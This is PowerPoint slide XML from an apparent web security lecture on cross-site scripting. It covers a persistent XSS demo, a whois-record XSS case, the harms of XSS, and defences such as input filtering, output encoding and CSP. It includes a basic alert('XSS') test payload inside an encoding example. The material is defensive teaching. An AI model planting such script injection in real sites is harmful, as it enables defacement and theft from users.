              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Persistent XSS: an example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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609" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1286321" y="342900"/>
            <a:ext cx="7750175"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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>In this example, a persistent XSS will execute when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> navigates to Leaderboard and clicks on Nissan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831372" y="2168224"/>
            <a:ext cx="6210300" cy="4196355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1278738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bwMode="auto">
          <a:xfrm>
            <a:off x="1115616" y="548680"/>
            <a:ext cx="1541711" cy="481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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Next thing we see</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB8494C-44EE-E447-94D2-77D1DD032AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2816313" y="0"/>
            <a:ext cx="6348073" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2964095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bwMode="auto">
          <a:xfrm>
            <a:off x="1043609" y="548680"/>
            <a:ext cx="1714864" cy="321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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>This is the comments section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203FC75F-C539-5B45-9FD6-5C688359EF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758473" y="536409"/>
            <a:ext cx="6385527" cy="5877272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715059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bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="548680"/>
            <a:ext cx="4752528" cy="321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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Let’s view the page source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C82F4CA-9EBD-7843-AE61-63E06B9C8118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2618343" y="967160"/>
            <a:ext cx="6525657" cy="5589240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35804377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1185739" y="264452"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Persistent XSS in reality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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002" y="1047089"/>
            <a:ext cx="4113212" cy="17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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214313" y="1349772"/>
            <a:ext cx="7750175" cy="927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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Get users’ browsers to dance the Harlem Shake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Watch this YouTube video: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=1anIUDvdCjY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>What do you think happened? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>	- The researcher inserted a DNS record for his 	website into a DNS server that contained XSS code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>	- Whenever his website is queried in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> by 	whoever, the XSS code loads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217786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1187624" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Damages caused by XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1340768"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web defacing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1956108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332656"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fundamental Cause of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1099332"/>
            <a:ext cx="7416824" cy="5758668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTML allows JavaScript code to be mixed with data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21014415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1187624" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1340768"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get rid of code from user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Separate code from data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="984545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1115616" y="593367"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Get rid of code: input filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1556792"/>
            <a:ext cx="7704856" cy="2212800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removes code from user inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is difficult to implement as there are many ways to embed code other than &lt;script&gt; tag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use open-source libraries that can filter out JavaScript code, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsoup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clean()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50744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971600" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Problem with Cross-Site Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Shape 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AC5DEE-8A25-DD49-8169-DDB1EC01994C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123728" y="1700808"/>
            <a:ext cx="5616624" cy="3456384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2888B72C-88BF-2845-BCE0-EDA8F6AAA2CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275856" y="2204864"/>
            <a:ext cx="889000" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6DECC0-ABE4-5B42-B6A4-E9758554615C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3720356" y="4077072"/>
            <a:ext cx="889000" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164734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971600" y="476672"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Get rid of code: output encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1412776"/>
            <a:ext cx="7704856" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replaces HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>markups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with alternative representations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Converts &lt;script&gt; alert(‘XSS’) &lt;/script&gt; to &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘XSS’)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16426635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435337"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separate code from data: Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043996" y="1844824"/>
            <a:ext cx="7557927" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Two ways to include JavaScript inside HTML: the inline approach and the link approach. </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3188545"/>
            <a:ext cx="7699737" cy="1867758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377662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435337"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separate code from data: CSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
